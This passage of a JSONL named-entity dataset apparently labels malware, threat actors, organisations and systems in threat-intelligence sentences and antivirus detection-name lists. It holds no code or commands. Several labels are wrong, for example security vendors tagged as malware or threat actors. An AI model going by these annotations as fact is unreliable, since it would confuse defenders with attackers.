fields [ ] .", "spans": {}, "info": {"id": "cyner2_train_005491", "source": "cyner2_train"}} {"text": "A backdoor also known as: Rootkit.Win32.Stuxnet!O Trojan/Stuxnet.a Win32/PcClient.ACH RTKT_STUXNET.SMA Win.Worm.Stuxnet-10 Rootkit.Win32.Stuxnet.a Trojan.Win32.Stuxnet.ioljg Trojan.Win32.Stuxnet.19968 Rootkit.W32.Stuxnet!c Win32.Rootkit.Stuxnet.Hxqi Trojan:W32/Stuxnet.A Trojan.Stuxnet.1 Rootkit.Stuxnet.Win32.5 RTKT_STUXNET.SMA Rootkit.Stuxnet.b W32.Stuxnet Trojan[Rootkit]/Win32.Stuxnet Win32.Troj.LnkExploit.aa.26616 Trojan.Graftor.DB580 Rootkit.Win32.Stuxnet.a Trojan:WinNT/Stuxnet.A Win-Trojan/Stuxnet.26872 SScope.Rootkit.TmpHider.2 Rootkit.Stuxnet.Z Rootkit.Win32.Stuxnet W32/Stuxnet.A!tr.rkit Win32/RootKit.Rootkit.f73", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005492", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Fleercivet.aa Win.Trojan.Fleercivet-3 BackDoor.Fleercivet.42 Trojan.Fleercivet.Win32.81 Trojan:Win64/Fleercivet.A Win64/Fleercivet.AA Trojan.Fleercivet!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005496", "source": "cyner2_train"}} {"text": "The threat group amassed a significant amount of data, from Skype account databases to planning documents and spreadsheets to photos.", "spans": {"THREAT_ACTOR: threat group": [[4, 16]], "SYSTEM: Skype account databases": [[60, 83]]}, "info": {"id": "cyner2_train_005497", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Spinfy.A4 Trojan/Injector.uni TROJ_FINSPY.A Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/FinFish.ZBVH-2442 Backdoor.Finfish TROJ_FINSPY.A Win.Trojan.FinFisher-1 Backdoor.Win32.Finfish.a Backdoor.W32.Finfish.a!c TrojWare.Win32.FinSpy.A Trojan.MulDrop3.31380 Backdoor.Finfish.Win32.3 W32/FinFish.A Trojan[Backdoor]/Win32.Finfish Trojan:Win32/Spinfy.A Trojan.FinFisher.1 Backdoor.Win32.Finfish.a Backdoor/Win32.Finfish.C198683 Trj/CI.A Win32.Backdoor.Finfish.Eeri Backdoor.Finfish!glcRlW9Rsiw 
Trojan.Win32.Finspy W32/Finfish.A!tr.bdr Win32/Trojan.5ec", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005499", "source": "cyner2_train"}} {"text": "Philadelphia has many features, including the ability to generate PDF reports and charts of victims to track the campaigns, as well as the ability to plot victims around the world using Google Maps.", "spans": {"MALWARE: Philadelphia": [[0, 12]], "THREAT_ACTOR: campaigns,": [[113, 123]], "ORGANIZATION: victims": [[155, 162]], "SYSTEM: Google Maps.": [[186, 198]]}, "info": {"id": "cyner2_train_005500", "source": "cyner2_train"}} {"text": "Is UrlZone still a threat and if so, how has it changed?", "spans": {"MALWARE: UrlZone": [[3, 10]], "MALWARE: threat": [[19, 25]]}, "info": {"id": "cyner2_train_005501", "source": "cyner2_train"}} {"text": "JPCERT/CC has been observing attacks using Datper since around June 2016.", "spans": {"MALWARE: JPCERT/CC": [[0, 9]], "MALWARE: Datper": [[43, 49]]}, "info": {"id": "cyner2_train_005503", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDropper.Dapato.S8172 TROJ_INDIGOROSE_FC140186.UVPM TROJ_INDIGOROSE_FC140186.UVPM Trojan.Win32.IndigoRose.eujbip Trojan.Win32.Z.Indigorose.2334813 Trojan.DownLoader21.23836 BehavesLike.Win32.BadFile.vh TR/Dldr.IndigoRose.xrkh TrojanDownloader:Win32/Inros.A Downloader.AdLoad Trj/CI.A Win32/TrojanDownloader.IndigoRose.AI Trojan-Downloader.Win32.Indigorose Win32/Trojan.b3d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005504", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.1019 O97M.Dropper.BS VB:Trojan.Valyria.1019 VB:Trojan.Valyria.1019 Trojan.Ole2.Vbs-heuristic.druvzi VB:Trojan.Valyria.1019 VB:Trojan.Valyria.1019 HEUR_VBA.D TrojanDownloader:O97M/Crosspim.A VB:Trojan.Valyria.D3FB VB:Trojan.Valyria.1019 VBA/TrojanDownloader.DZN!tr virus.office.qexvmc.1075", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005505", 
"source": "cyner2_train"}} {"text": "Unit 42 has recently discovered a new keylogger, named NexusLogger, being used in attempted unsuccessful attacks against Palo Alto Networks customers.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: keylogger,": [[38, 48]], "MALWARE: NexusLogger,": [[55, 67]], "ORGANIZATION: Palo Alto Networks customers.": [[121, 150]]}, "info": {"id": "cyner2_train_005507", "source": "cyner2_train"}} {"text": "They seem to use the same technique of mimicking a website associated with well-known software like Notepad++ and Blender 3D.", "spans": {"SYSTEM: software": [[86, 94]], "SYSTEM: Notepad++": [[100, 109]], "SYSTEM: Blender 3D.": [[114, 125]]}, "info": {"id": "cyner2_train_005508", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D39F0E Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.DownLoader25.65030 BehavesLike.Win32.Trojan.bh TrojanDropper:MSIL/Muldalun.A!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005509", "source": "cyner2_train"}} {"text": "In May 2017, Palo Alto Networks Unit 42 identified a limited spear phishing campaign targeting various individuals across the world.", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[13, 39]], "THREAT_ACTOR: spear phishing campaign": [[61, 84]]}, "info": {"id": "cyner2_train_005510", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Androm.drayhs Trojan.DownLoader18.10874 Downloader.Banload.Win32.64034 Trojan/Inject.axyw TrojanDownloader:Win32/BrobanLaw.A Trojan.Strictor.D15B7B Trojan/Win32.MDA.R160449 Trojan.Banker.IGF", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005511", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.LibarokI.Trojan Trojan/Scar.ejki Win32.Trojan.WisdomEyes.16070401.9500.9609 Trojan.Badlib Win.Downloader.Delf-12262 Trojan.Win32.Scar.256000.B Trojan.DownLoader4.22959 Trojan.Scar.Win32.50666 Backdoor.Win32.Bafruz 
Backdoor:Win32/Bafruz.C Trojan.Delf.01357 Bck/Koobface.AA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005512", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Bagsu.S31234 Trojan/IRCBot.nhr BKDR_IRCBOT.SMB Backdoor.IRC.Bot BKDR_IRCBOT.SMB BehavesLike.Win32.Dropper.cm Backdoor.Win32.Ursap Backdoor.Athena Win32/IRCBot.NHR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005513", "source": "cyner2_train"}} {"text": "It is mainly an information stealer and malware downloader network which installs other malware on infected machines.", "spans": {"MALWARE: malware downloader network": [[40, 66]], "MALWARE: malware": [[88, 95]], "SYSTEM: infected machines.": [[99, 117]]}, "info": {"id": "cyner2_train_005514", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PSW.FakeAIM.C Trojan.PSW.FakeAIM.C Trojan.PSW.FakeAIM.C W32/PWS.BXQR-8711 Infostealer.Snatch Trojan.PSW.FakeAIM.C Trojan-PSW.Win32.FakeAIM.d Trojan.PSW.FakeAIM.C Trojan.Win32.FakeAIM.dgtt Trojan.Win32.PSWFakeAIM.78848 Troj.PSW32.W.FakeAIM.c!c Trojan.PSW.FakeAIM.C TrojWare.Win32.PSW.FakeAIM.D Trojan.PSW.FakeAIM.C Trojan.PWS.Fakeaim Trojan.FakeAIM.Win32.6 BehavesLike.Win32.Trojan.lc W32/Pws.TXC Trojan/PSW.FakeAIM.c TR/PSW.FakeAIM.C.1 Trojan[PSW]/Win32.FakeAIM PWS:Win32/FakeAIM.C Trojan-PSW.Win32.FakeAIM.d Trojan/Win32.Xema.R89227 TScope.Trojan.VB Win32/PSW.FakeAIM.D W32/AIMFake.C!tr.pws Win32/Trojan.PSW.ee5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005515", "source": "cyner2_train"}} {"text": "On March 9 2016, Cyphort Labs discovered an infection on a porn site keng94dotcom redirecting visitors to an exploit kit and installing a Ransom Locker.", "spans": {"ORGANIZATION: Cyphort Labs": [[17, 29]], "MALWARE: exploit kit": [[109, 120]], "MALWARE: Ransom Locker.": [[138, 152]]}, "info": {"id": "cyner2_train_005516", "source": "cyner2_train"}} {"text": "One good thing about having a lot of Facebook 
friends is that you simply act as a honey pot when your friends click on malicious things.", "spans": {"ORGANIZATION: Facebook friends": [[37, 53]], "MALWARE: malicious": [[119, 128]]}, "info": {"id": "cyner2_train_005517", "source": "cyner2_train"}} {"text": "The malicious script fingerprints the victim's machine and can receive any command that will run via PowerShell.", "spans": {"SYSTEM: the victim's machine": [[34, 54]]}, "info": {"id": "cyner2_train_005521", "source": "cyner2_train"}} {"text": "Instead, an accurate assessment is that a previously active Windows botnet is spreading a Mirai bot variant.", "spans": {"MALWARE: Windows botnet": [[60, 74]], "MALWARE: Mirai bot variant.": [[90, 108]]}, "info": {"id": "cyner2_train_005522", "source": "cyner2_train"}} {"text": "ESET researchers analyzed a preference file that was used to compromise the system when Uploader! is launched.", "spans": {"ORGANIZATION: ESET researchers": [[0, 16]], "SYSTEM: system": [[76, 82]], "SYSTEM: Uploader!": [[88, 97]]}, "info": {"id": "cyner2_train_005523", "source": "cyner2_train"}} {"text": "These campaigns not only represent an uptick in our observed instances of Kronos banker but also a new application of the malware that was first introduced in June 2014 and that we most recently described in relation to campaigns targeting Canada.", "spans": {"MALWARE: campaigns": [[6, 15]], "MALWARE: Kronos banker": [[74, 87]], "MALWARE: malware": [[122, 129]], "THREAT_ACTOR: campaigns": [[220, 229]]}, "info": {"id": "cyner2_train_005524", "source": "cyner2_train"}} {"text": "The Anthem attack is only one of multiple campaigns that Symantec has attributed to this group.", "spans": {"ORGANIZATION: Anthem": [[4, 10]], "THREAT_ACTOR: multiple campaigns": [[33, 51]], "THREAT_ACTOR: Symantec": [[57, 65]], "THREAT_ACTOR: group.": [[89, 95]]}, "info": {"id": "cyner2_train_005525", "source": "cyner2_train"}} {"text": "This blog post describes details that we discovered during our analysis of malware 
that focuses on a specific country — Libya.", "spans": {"ORGANIZATION: blog post": [[5, 14]], "MALWARE: malware": [[75, 82]]}, "info": {"id": "cyner2_train_005526", "source": "cyner2_train"}} {"text": "This Zscaler ThreatLabz research article investigates the latest malware campaign of DBatLoader, which is being used by threat actors to target various businesses in European countries with Remcos RAT and Formbook.", "spans": {"ORGANIZATION: Zscaler ThreatLabz research": [[5, 32]], "THREAT_ACTOR: malware campaign": [[65, 81]], "MALWARE: DBatLoader,": [[85, 96]], "THREAT_ACTOR: threat actors": [[120, 133]], "ORGANIZATION: businesses": [[152, 162]], "MALWARE: Remcos RAT": [[190, 200]], "MALWARE: Formbook.": [[205, 214]]}, "info": {"id": "cyner2_train_005527", "source": "cyner2_train"}} {"text": "A backdoor also known as: VBA.Trojan.Obfuscated.af W2KM_DLOADR.YYSQK Trojan.Ole2.Vbs-heuristic.druvzi W2KM_DLOADR.YYSQK Trojan:X97M/ShellHide.C virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005529", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.F21F W32/Trojan2.MVJQ Trojan.Win32.Ace.cxham Win32.Backdoor.Ace.ciih Trojan.DownLoader1.8121 Backdoor.Ace.Win32.86 BehavesLike.Win32.Dropper.hh W32/Trojan.QDLI-0337 Trojan[Backdoor]/ASP.Ace TrojanDownloader:Win32/Pluzoks.A Backdoor/Win32.Ace.C78643 Backdoor.ASP.Ace Adware.Ezipop Win32/Adware.AdTrigger W32/ASP_Ace.MF!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005531", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Rahima.28672 Win32.Trojan.WisdomEyes.16070401.9500.9607 W32/Rahima.QDHZ-4096 W32.Fourseman.B@mm P2P-Worm.Win32.Rahima Trojan.Win32.Rahima.enoe Worm.Win32.P2P-Rahima.28672 W32.W.Rahima!c Worm.Rahima W32/Rahima.A I-Worm/Himera.i WORM/Rahima.A Worm[P2P]/Win32.Rahima P2P-Worm.Win32.Rahima Worm.Rahima Win32.Worm-p2p.Rahima.Pefs Worm.P2P.Rahima W32/Himera.J!worm.p2p Win32/Worm.IM.a16", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005533", "source": "cyner2_train"}} {"text": "The use of Lua modules, which we'll discuss later, is a technique that has previously been used by Flamer.", "spans": {"MALWARE: Lua modules,": [[11, 23]], "THREAT_ACTOR: Flamer.": [[99, 106]]}, "info": {"id": "cyner2_train_005534", "source": "cyner2_train"}} {"text": "In August 2012, an attack campaign known as Shamoon targeted a Saudi Arabian energy company to deliver a malware called Disttrack.", "spans": {"THREAT_ACTOR: attack campaign": [[19, 34]], "THREAT_ACTOR: Shamoon": [[44, 51]], "ORGANIZATION: energy company": [[77, 91]], "MALWARE: malware": [[105, 112]], "MALWARE: Disttrack.": [[120, 130]]}, "info": {"id": "cyner2_train_005535", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Geral!O TrojanDownloader.Begseabug.A5 Trojan/Downloader.Geral.aazb Trojan.Graftor.D540C W32.SillyDC Win.Trojan.Downloader-22789 Trojan-Downloader.Win32.Geral.aazb Trojan.Win32.Geral.dkhaf Trojan.Win32.A.Downloader.50176.GE Troj.Downloader.W32.Geral.aazb!c Trojan.Swizzor.18871 Downloader.Geral.Win32.7037 BehavesLike.Win32.Backdoor.ph Trojan-Downloader.Win32.Geral TrojanDownloader.Geral.cjc TrojanDownloader:Win32/Begseabug.A Trojan-Downloader.Win32.Geral.aazb Trojan/Win32.Scar.R4495 TrojanDownloader.Geral Trojan.KillAV Win32.Trojan-downloader.Geral.Sqtn Trojan.DL.Geral!qBECnW5XLLM W32/Pincav.SNS!tr Win32/Trojan.836", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005536", "source": "cyner2_train"}} {"text": "Other configuration data is located elsewhere , and some of it can been seen here : The encrypted library path The output folder on the device for the dropped library The name of the library after it is loaded eventBot name string Version number A string used as an RC4 key , both for decrypting the library and as a part of the network data encryption ( hasn ’ t changed from the previous version ) The 
C2 URLs A randomized class name using the device ’ s accessibility services EventBot extracted configuration Part of the extracted configuration of the new version .", "spans": {"MALWARE: EventBot": [[480, 488]]}, "info": {"id": "cyner2_train_005537", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAdware.1F0C Adware.SearchSafer.A Adware.OutBrowse/Variant Win32.Trojan.WisdomEyes.16070401.9500.9922 Downloader.Sesafer TROJ_GE.24FE3DBE not-a-virus:Downloader.Win32.SearchSafe.a Adware.SearchSafer.A Trojan.Nsis.SearchSafe.dyoiec Adware.SearchSafer.A Adware.Downware.3008 Downloader.SearchSafe.Win32.2 TROJ_GE.24FE3DBE TR/AD.Uascape.myjsl Trojan:Win32/Uascape.A Adware.SearchSafer.A not-a-virus:Downloader.Win32.SearchSafe.a Adware.SearchSafer.A Downloader.SearchSafe PUP.Optional.SearchSafer PUA.Downloader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005539", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.ScaraNV.Trojan Trojan/W32.Scar.1611453 Trojan.Win32.Scar!O TrojanDropper.Scudy.S12799 Trojan.Scar.Win32.11534 Trojan.Zusy.D382CD WORM_SCUDY.SMA WORM_SCUDY.SMA Trojan.Win32.A.Scar.876573 Trojan:W32/Scar.O Trojan.Click1.19227 Trojan/Scar.flx TrojanDropper:Win32/Scudy.A Trojan/Win32.Scar.R45219 Trojan.Scar Trojan.Dropper Trojan.Scar!3JbHUSbGsGc Trojan.Win32.Scar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005540", "source": "cyner2_train"}} {"text": "On April 19, Cyphort hardware sandbox trolled over a site www.49lou.com that served up 83 pieces of Windows executable files EXE and DLL binaries with zero user interaction.", "spans": {"MALWARE: Cyphort hardware sandbox": [[13, 37]], "SYSTEM: 83 pieces of Windows executable files EXE and DLL binaries": [[87, 145]]}, "info": {"id": "cyner2_train_005541", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Vake BehavesLike.Win32.BadFile.mt Trojan.Win32.Vake TR/Vake.onkgl Trojan.Heur.RX.EDF54F Trojan:Win32/Vake.D 
Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005542", "source": "cyner2_train"}} {"text": "Another interesting artifact part of the EK flow is the use of an XML configuration file which contains JScript code.", "spans": {"MALWARE: EK": [[41, 43]]}, "info": {"id": "cyner2_train_005543", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Votos Trojan.Zusy.D151C6 Win32.Trojan.WisdomEyes.16070401.9500.9956 Trojan.Win32.Clicker.cqsnmq Trojan.Win32.Z.Zusy.314880.BK Trojan.Click2.61352 Trojan-Downloader.Win32.Votos W32/Trojan.OORK-3033 TR/Taranis.2482 Trojan[Dropper]/Win32.Dinwod TrojanDownloader:Win32/Votos.A Trojan/Win32.Votos.R105546 TrojanDropper.Dinwod Trj/CI.A Win32/Trojan.ac2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005545", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Trojan.OXFE-7365 Backdoor.Chilurat Trojan.Win32.Trochil.a BehavesLike.Win32.Downloader.mz Trojan.Trochil.a Trojan.Win32.Trochil.a Trojan:Win32/Trochil.A Win32.Trojan.Trochil.Wrqj Win32/Trojan.369", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005547", "source": "cyner2_train"}} {"text": "Threat Source newsletter March 2, 2023 — Little victories in the fight against ransomware", "spans": {"ORGANIZATION: Threat Source newsletter": [[0, 24]], "MALWARE: ransomware": [[79, 89]]}, "info": {"id": "cyner2_train_005550", "source": "cyner2_train"}} {"text": "This round of FIN7 phishing lures implements hidden shortcut files LNK files to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.", "spans": {"THREAT_ACTOR: FIN7 phishing": [[14, 27]], "MALWARE: mshta.exe": [[142, 151]], "ORGANIZATION: victim.": [[166, 173]]}, "info": {"id": "cyner2_train_005551", "source": "cyner2_train"}} {"text": "In 2014, TrendMicro began seeing attacks that abused the Windows PowerShell.", "spans": {"ORGANIZATION: TrendMicro": [[9, 19]], 
"SYSTEM: the Windows PowerShell.": [[53, 76]]}, "info": {"id": "cyner2_train_005552", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9944 TSPY_EMOTET.SMD3 Trojan.Win32.Inject.exldsx Trojan.Encoder.24431 TSPY_EMOTET.SMD3 BehavesLike.Win32.Backdoor.dc Trojan.Jorik.afpv TR/Crypt.ZPACK.uxhop Trojan[Dropper]/Win32.Scrop Ransom:Win32/Pulobe.A Trojan.Midie.DA9F2 Trojan.SmokeLoader Win32/Trojan.9b7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005553", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9961 Trojan-Dropper.Win32.Dapato TrojanDropper:Win32/Ambler.F Trojan.Zusy.953", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005554", "source": "cyner2_train"}} {"text": "[clearskysec] Attacks against all targets in the Middle East stopped at once, after we published our first report.", "spans": {"ORGANIZATION: [clearskysec]": [[0, 13]], "ORGANIZATION: targets": [[34, 41]]}, "info": {"id": "cyner2_train_005555", "source": "cyner2_train"}} {"text": "Thanatos is being marketed as a service with both short and long-term subscriptions and support and the authors claim it is under ongoing development with new plugins and functionality being actively added", "spans": {"MALWARE: Thanatos": [[0, 8]], "THREAT_ACTOR: authors": [[104, 111]], "SYSTEM: plugins": [[159, 166]]}, "info": {"id": "cyner2_train_005556", "source": "cyner2_train"}} {"text": "Details about the sample, including a hash are available at the end of this writeup.", "spans": {}, "info": {"id": "cyner2_train_005557", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Spy.MSIL.KeyLogger!O TrojanSpy.Moorest Trojan/KeyLogger.iec Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Trojan2.NZWO TSPY_MOOREST.SMJJ Trojan-Spy.MSIL.KeyLogger.iec Trojan.Win32.Clicker.dkktnp IM-Flooder.W32.Delf.l2lu Msil.Trojan-spy.Keylogger.Pito Trojan.Click2.7338 
TSPY_MOOREST.SMJJ W32/Trojan.CJSE-3516 Trojan-Spy.MSIL.KeyLogger.iec TrojanSpy:MSIL/Moorest.A TrojanSpy.MSIL.KeyLogger MSIL/Spy.Keylogger.GT Win32/Trojan.Spy.9b9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005559", "source": "cyner2_train"}} {"text": "A backdoor also known as: Pwstool.Cain Application.Pwcrack.Cain.GL not-a-virus:PSWTool.Win32.Cain.s Application.Pwcrack.Cain.GL Riskware.Win32.Cain.ewvhjq Application.Pwcrack.Cain Tool.Cain PUA.CainAbel PSWTool.Cain.c DR/PSW.Cain.284.47 not-a-virus:PSWTool.Win32.Cain.s Trj/CI.A Win32/Trojan.Dropper.0c3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005562", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Ainslot.A3 Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_BLADABI.SMC Trojan.Win32.Drop.dcmduv Trojan.Win32.Z.Fraudrop.205824 Backdoor.MSIL.Parama.RANG BKDR_BLADABI.SMC BehavesLike.Win32.Trojan.dh Trojan-Dropper.Win32.Dorifel Trojan[Dropper]/Win32.FrauDrop Win32.Troj.FrauDrop.kcloud PWS:MSIL/Mintluks.A Trojan/Win32.FrauDrop.R127506 TrojanDropper.FrauDrop MSIL/Blocker.PAN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005563", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Webcrack.A Trojan/WebCracker.a W32/Trojan.NDIN-1455 Application.Webcrack.A Application.Webcrack.A Riskware.Win32.WebCrack.bbira Application.Webcrack.A TrojWare.Win32.WebCracker.A Application.Webcrack.A Tool.WebCrack Trojan.WebCracker.Win32.2 W32/Trojan2.MHTV HackTool.WebCrack.40 Win32.Troj.WebCracker.A.kcloud Application.Webcrack.A Trojan/Win32.Webcracker.R66570 Trojan.Webcracker Win32/WebCracker.A Trojan.Win32.WebCracker.tfe Trojan.Win32.Webcracker Trojan.Win32.WebCraker.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005564", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Cossta.152000 Trojan.Cossta W32/Trojan.OSNY-0798 Backdoor.Cruprox Win32/NukeSped.AK 
Trojan/NukeSped.ak Trojan.Win32.Cossta.akea Trojan.Win32.Cossta.erwfkk Troj.W32.Cossta!c Trojan.DownLoader25.21345 Trojan.Cossta.Win32.10320 BehavesLike.Win32.MysticCompressor.cm Trojan.Win32.Cossta Worm/AutoIt.nml Trojan/Win32.Cossta Trojan.Win32.Cossta.akea Trojan/Win32.Cossta.C2091223 Win32.Trojan.Cossta.Syrj Trojan.Cossta!Kqe4w1x4ygI W32/Cossta.AKEA!tr Trojan.Cossta Trj/CI.A Win32/Trojan.b36", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005565", "source": "cyner2_train"}} {"text": "Preferences such as the FTP hostname and username are stored in a file named uploadpref.dat.", "spans": {}, "info": {"id": "cyner2_train_005568", "source": "cyner2_train"}} {"text": "There has been no evidence found yet that funds have been stolen from any infected banks.", "spans": {}, "info": {"id": "cyner2_train_005569", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clode7b.Trojan.1410 Virtool.6143 Virtool.6143 Flooder.Piaoyes!YL6KHAf2k3Q Flooder.AG Flooder.Win32.Piaoyes.40 Virtool.6143 Virtool.6143 TrojWare.Win32.Flooder.Piaoyes.40 Virtool.6143 TR/Flood.Piaoyes.40.2 HackTool.Piaoyes Win32.Hack.Piaoyes.40.kcloud Win-Trojan/Piaoyes.171008 Virtool.6143 W32/Risk.PMPJ-1484 Win32/Flooder.Piaoyes.40 Flooder.Win32.Piaoyes.40 W32/Piaoyes.40!tr Flooder.DTA Trojan.Win32.Flooder.aS Win32/Trojan.Flood.199", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005570", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Ivruat.A11 Worm.AutoRun.Win32.120028 Win32.Trojan.WisdomEyes.16070401.9500.9986 W32/Trojan.TNXK-0638 Trojan.Win32.Autoruner2.cvshvv Win32.HLLW.Autoruner2.20037 BehavesLike.Win32.BadFile.fh Trojan.Win32.Spy W32/Trojan2.OYTC W32.Worm.Pqk Worm:Win32/Ivruat.A Worm/Win32.AutoRun.R140023 Win32.Worm.Autorun.Dxwf Trojan.Scar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005571", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Optix.340187 
Backdoor.Win32.Optix!O Trojan.Madtol.C Backdoor.Optix Packer.W32.NSAnti.kZ85 Backdoor/Optix.f W32/OptixPro.I Backdoor.OptixPro.13 Win32/OptixPro.F BKDR_OPTIXPRO.H Win.Trojan.Optix-5 Backdoor.Win32.Optix.b Trojan.Win32.Optix.bslhnb Backdoor.Win32.Optix_Pro.340203 Trojan.DownLoader.60627 BKDR_OPTIXPRO.H BehavesLike.Win32.Dropper.fc W32/OptixPro.WZQS-7361 Backdoor/Optix.Pro.bd BDS/Optix.Pro.13.7 Trojan[Backdoor]/Win32.Optix Backdoor:Win32/Optixpro.T Backdoor.Win32.Optix.b Trojan/Win32.Xema.C66170 Backdoor.Optix Bck/OptixPro.C Win32/Optix.Pro.13 Backdoor.Optix.Pro.BD Backdoor.Win32.Optix", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005573", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Hider!O W32/Backdoor.BVFG TROJ_HIDER.I Win.Trojan.Hider-4 Trojan.Win32.Hider.234496 Troj.W32.Hider.toFP Trojan.Hidn Trojan.Hider.Win32.266 TROJ_HIDER.I Trojan-Dropper.Delf Trojan/Win32.Hider.gh Win32.Troj.Hider.i.234496 Trojan.Win32.Hider.gh Trojan.Hider Win32/Trojan.0bc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005574", "source": "cyner2_train"}} {"text": "Over the past few months, new strains of this infamous Android malware family have surfaced in third-party APK markets, as well as in the official Google Play store.", "spans": {"MALWARE: strains": [[30, 37]], "MALWARE: Android malware family": [[55, 77]], "SYSTEM: APK markets,": [[107, 119]], "SYSTEM: the official Google Play store.": [[134, 165]]}, "info": {"id": "cyner2_train_005576", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.VBKrypt.315392.AK Trojan.Win32.VBKrypt!O Trojan/Injector.wms Win32.Trojan.Inject.bh HV_VBKRYPT_CG092B3E.RDXN Trojan.Win32.VBKrypt.nrzc Trojan.Win32.VBKrypt.dzjqpk Trojan.MulDrop4.8756 Trojan.VBKrypt.Win32.180705 BehavesLike.Win32.BadFile.fh Trojan-PWS.Win32.Zbot Trojan.VBKrypt.amiu Trojan/Win32.VBKrypt Trojan.Symmi.D4542 Trojan.Win32.A.VBKrypt.315392.CI Trojan.Win32.VBKrypt.nrzc 
Worm:Win32/Secrar.A Trojan/Win32.Jorik.R37626 BScope.Worm.Gamarue.1191 W32/VBKrypt.MBW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005578", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Proxy/W32.Mitglieder.8304 Trojan/Proxy.Mitglieder.af TrojanProxy.Mitglied!TVlYB86T2l0 Trojan.Mitglieder.G Win32/Mitglieder.Z TSPY_TARNO.D Trojan.Win32.Mitglieder.dkdz TrojWare.Win32.TrojanProxy.Mitglieder.AF Trojan.Mitglieder.Win32.173 TSPY_TARNO.D BehavesLike.Win32.Downloader.xc W32/Mitglieder.M TrojanProxy.Mitglieder.h Win32.Troj.Mitglieder.af.kcloud TrojanProxy:Win32/Mitglieder.DK Win-Trojan/Mitglieder.8304 Trojan-Proxy.Win32.Mitglieder.e Trojan.Win32.Mitglieder.aTNT Win32/TrojanProxy.Mitglieder.AF Win32.Trojan-proxy.Mitglieder.Ectn Trojan-Proxy.Win32.Mitglieder.CL W32/Tarno.D!tr Proxy.4.AZ Win32/Trojan.63b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 